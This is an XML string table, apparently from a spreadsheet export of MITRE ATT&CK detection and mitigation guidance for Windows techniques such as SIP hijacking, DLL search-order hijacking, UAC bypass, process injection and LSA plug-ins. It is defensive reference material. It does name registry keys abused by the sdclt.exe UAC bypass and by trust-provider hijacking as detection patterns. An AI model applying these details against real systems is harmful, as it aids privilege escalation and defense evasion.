    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.[[CiteRef::SpectorOps Subverting Trust Sept 2017]]
Enable CryptoAPI v2 (CAPI) event logging[[CiteRef::Entrust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3033).[[CiteRef::SpectorOps Subverting Trust Sept 2017]]
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing)[[CiteRef::Microsoft Registry Auditing Aug 2016]] setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers:[[CiteRef::Microsoft Audit Registry July 2012]]
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
* '''Note:''' As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [[T1117|Regsvr32]].[[CiteRef::SpectorOps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deselected.[[CiteRef::SpectorOps Subverting Trust Sept 2017]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1198</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [[T1038|DLL Search Order Hijacking]].[[CiteRef::SpectorOps Subverting Trust Sept 2017]]
Consider removing unnecessary and/or stale SIPs.[[CiteRef::SpectorOps Subverting Trust Sept 2017]]
Restrict storage and execution of SIP DLLs to protected directories, such as C:\Windows, rather than user directories.
Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence,Privilege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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1038</t>
  </si>
  <si>
    <t>Disallow loading of remote DLLs.[[CiteRef::Microsoft DLL Preloading]] This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+.[[CiteRef::Microsoft DLL Search Path Algorithm]]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Manager\SafeDLLSearchMode&lt;/code&gt;[[CiteRef::Microsoft DLL Search]]
Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses.[[CiteRef::Powersploit]]
Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;.[[CiteRef::Microsoft Dev Blog IFEO Mar 2010]]
Monitor the IFEOs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx.[[CiteRef::Engame Process Injection July 2017]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1183</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all IFEO will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly.[[CiteRef::Microsoft IFEOorMalware July 2015]] Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Identify and block potentially malicious software that may be executed through IFEO by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown executables.</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence,Privilege Escalation,Initial Access</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.[[CiteRef::TechNet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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1078</t>
  </si>
  <si>
    <t>Take measures to detect or prevent techniques such as [[T1003|Credential Dumping]] or installation of keyloggers to acquire credentials through [[T1056|Input Capture]]. Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network.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tiers.[[CiteRef::Microsoft Securing Privileged Access]]. Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.[[CiteRef::TechNet Credential Theft]][[CiteRef::TechNet Least Privilege]]</t>
  </si>
  <si>
    <t>Defense Evasion,Privilege Escalation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</si>
  <si>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Windows.[[CiteRef::Microsoft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&lt;code&gt;LogonUser&lt;/code&gt;[[CiteRef::Microsoft LogonUser]], &lt;code&gt;DuplicateTokenEx&lt;/code&gt;[[CiteRef::Microsoft DuplicateTokenEx]], and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;[[CiteRef::Microsoft ImpersonateLoggedOnUser]]).  Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.[[CiteRef::BlackHat Atkinson Winchester Token Manipulation]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1134</t>
  </si>
  <si>
    <t>Access tokens are an integral part of the security system within Windows and cannot be turned off.  However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.
Any user can also spoof access tokens if they have legitimate credentials.  Follow mitigation guidelines for preventing adversary use of [[T1078|Valid Accounts]].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object.[[CiteRef::Microsoft Create Token]] Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.[[CiteRef::Microsoft Replace Process Token]]
Also limit opportunities for adversaries to increase privileges by limiting [[Privilege Escalation]] opportunities.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</si>
  <si>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[[T1055|Process Injection]] and unusual loaded DLLs through [[T1038|DLL Search Order Hijacking]],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key.[[CiteRef::enigma0x3 Fileless UAC Bypass]]
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.[[CiteRef::enigma0x3 sdclt app paths]][[CiteRef::enigma0x3 sdclt bypass]]
Analysts should monitor these Registry settings for unauthorized changes. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1088</t>
  </si>
  <si>
    <t>Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [[T1038|DLL Search Order Hijacking]]. 
Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.[[CiteRef::Github UACMe]]</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong[[CiteRef::Microsoft GetWindowLong function]] and SetWindowLong[[CiteRef::Microsoft SetWindowLong function]]. Malware associated with this technique have also used SendNotifyMessage[[CiteRef::Microsoft SendNotifyMessage function]] to trigger the associated window procedure and eventual malicious injection.[[CiteRef::Engame Process Injection July 2017]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1181</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</si>
  <si>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EWM injection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</si>
  <si>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 and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique.[[CiteRef::Engame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[[CiteRef::ArtOfMemoryForensics]] [[CiteRef::GNU Acct]] [[CiteRef::RHEL auditd]] [[CiteRef::Chokepoint preload rootkits]]
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.[[CiteRef::Microsoft Sysmon v6 May 2017]]
Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using [[T1086|PowerShell]] with tools such as PowerSploit,[[CiteRef::Powersploit]] so additional PowerShell monitoring may be required to cover known implementations of this behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1055</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.[[CiteRef::GDSecurity Linux injection]]
Identify or block potentially malicious software that may contain process injection functionality by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
Utilize Yama [[CiteRef::Linux kernel Yama]] to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux [[CiteRef::SELinux official]], grsecurity [[CiteRef::grsecurity official]], and AppAmour [[CiteRef::AppArmor official]].</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1087</t>
  </si>
  <si>
    <t>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elevation.[[CiteRef::UCF STIG Elevation Account Enumeration]]
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1010</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]].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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1217</t>
  </si>
  <si>
    <t>File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. For example, mitigating accesses to browser bookmark files will likely have unintended side effects such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1083</t>
  </si>
  <si>
    <t>File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1046</t>
  </si>
  <si>
    <t>Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1135</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1201</t>
  </si>
  <si>
    <t>Mitigating discovery of password policies is not advised since the information is required to be known by systems and users of a network. Ensure password policies are such that they mitigate brute force attacks yet will not give an adversary an information advantage because the policies are too light. Active Directory is a common way to set and enforce password policies throughout an enterprise network.[[CiteRef::Microsoft Password Complexity]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1120</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1069</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1057</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them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</si>
  <si>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[[Software/S0075|Reg]]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</si>
  <si>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https://attack.mitre.org/wiki/T1012</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1018</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1063</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1082</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1016</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system's network configuration, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1049</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1033</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1007</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1124</t>
  </si>
  <si>
    <t>Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.
Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1059</t>
  </si>
  <si>
    <t>Audit and/or block command-line interpreters by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>OLE and Office Open XML files can be scanned for ?DDEAUTO', ?DDE?, and other strings indicative of DDE execution.[[CiteRef::NVisio Labs DDE Detection Oct 2017]]
Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.
Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1173</t>
  </si>
  <si>
    <t>Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution.[[CiteRef::Microsoft DDE Advisory Nov 2017]][[CiteRef::BleepingComputer DDE Disabled in Word Dec 2017]][[CiteRef::GitHub Disable DDEAUTO Oct 2017]] Microsoft also created Registry keys to completely disable DDE execution in Word and Excel.[[CiteRef::Microsoft ADV170021 Dec 2017]]
Ensure Protected View is enabled[[CiteRef::Microsoft Protected View]] and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View.[[CiteRef::Enigma Reviving DDE Jan 2018]][[CiteRef::GitHub Disable DDEAUTO Oct 2017]]
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs.[[CiteRef::Microsoft ASR Nov 2017]][[CiteRef::Enigma Reviving DDE Jan 2018]]</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1106</t>
  </si>
  <si>
    <t>Mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior. Audit and/or block potentially malicious software by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1129</t>
  </si>
  <si>
    <t>Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.</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</si>
  <si>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[[T1055|Process Injection]] for attempts to hide execution, evidence of [[Discovery]], or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1203</t>
  </si>
  <si>
    <t>Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist.[[CiteRef::Windows Blogs Microsoft Edge Sandbox]][[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist.[[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.[[CiteRef::TechNet Moving Beyond EMET]] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.[[CiteRef::Wikipedia Control Flow Integrity]] Many of these protections depend on the architecture and target application binary for compatibility.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1061</t>
  </si>
  <si>
    <t>Prevent adversaries from gaining access to credentials through [[Credential Access]] that can be used to log into remote desktop sessions on systems.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] and Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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execution.[[CiteRef::Malware Archaeology PowerShell Cheat Sheet]] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[[CiteRef::FireEye PowerShell Logging 2016]] An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1086</t>
  </si>
  <si>
    <t>It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.[[CiteRef::Netspi PowerShell Execution Policy Bypass]] Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.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</si>
  <si>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[[Software/S0029|PsExec]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1035</t>
  </si>
  <si>
    <t>Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.
Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain [[Initial Access]] that require user interaction. This includes compression applications, such as those for zip files, that can be used to [[T1140|Deobfuscate/Decode Files or Information]]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[[T1203|Exploitation for Client Execution]] and [[T1064|Scripting]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1204</t>
  </si>
  <si>
    <t>Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Application whitelisting may be able to prevent the running of executables masquerading as other files.
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 in [[T1027|Obfuscated Files or Information]].
If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct files in a way to avoid these systems.</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform 4688 to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior.[[CiteRef::FireEye WMI 2015]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1047</t>
  </si>
  <si>
    <t>Disabling WMI or RPCS may cause system instability and should be evaluated to assess the impact to a network.  By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts.[[CiteRef::FireEye WMI 2015]]</t>
  </si>
  <si>
    <t>Execution,Lateral Movement</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1072</t>
  </si>
  <si>
    <t>Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.
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[[T1068|Exploitation for Privilege Escalation]].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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1028</t>
  </si>
  <si>
    <t>Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices.[[CiteRef::NSA Spotting]]</t>
  </si>
  <si>
    <t>Execution,Persistence</t>
  </si>
  <si>
    <t>With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers.[[CiteRef::Microsoft LSA Protection Mar 2014]]
Utilize the Sysinternals Autoruns/Autorunsc utility[[CiteRef::TechNet Autoruns]] to examine loaded drivers associated with the LSA.
Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe.[[CiteRef::Microsoft DLL Security]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1177</t>
  </si>
  <si>
    <t>On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; to &lt;code&gt;dword:00000001&lt;/code&gt;.[[CiteRef::Microsoft LSA Protection Mar 2014]] LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.
On Windows 10 and Server 2016, enable Windows Defender Credential Guard[[CiteRef::Microsoft Enable Cred Guard April 2017]] to run lsass.exe in an isolated virtualized environment without any device drivers.[[CiteRef::Microsoft Credential Guard April 2017]]
Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library.[[CiteRef::Microsoft DLL Security]]</t>
  </si>
  <si>
    <t>Execution,Persistence,Privilege Escalation</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</si>
  <si>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Windows.[[CiteRef::Twitter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service.[[CiteRef::TechNet Forum Scheduled Task Operational Setting]] Several events will then be logged on scheduled task activity, including:[[CiteRef::TechNet Scheduled Task Events]]
*Event ID 106 - Scheduled task registered
*Event ID 140 - Scheduled task updated
*Event ID 141 - Scheduled task removed
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks.[[CiteRef::TechNet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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1053</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate [[Privilege Escalation]] vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges.[[CiteRef::Powersploit]]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disabled.[[CiteRef::TechNet Server Operator Scheduled Task]]
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priority.[[CiteRef::TechNet Scheduling Priority]]
Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1020</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through 4688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headers.[[CiteRef::Wikipedia File Header Signatures]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1002</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.</t>
  </si>
  <si>
    <t>Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through 4688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transmitted.[[CiteRef::Zhang 2013]] If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.[[CiteRef::Wikipedia File Header Signatures]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1022</t>
  </si>
  <si>
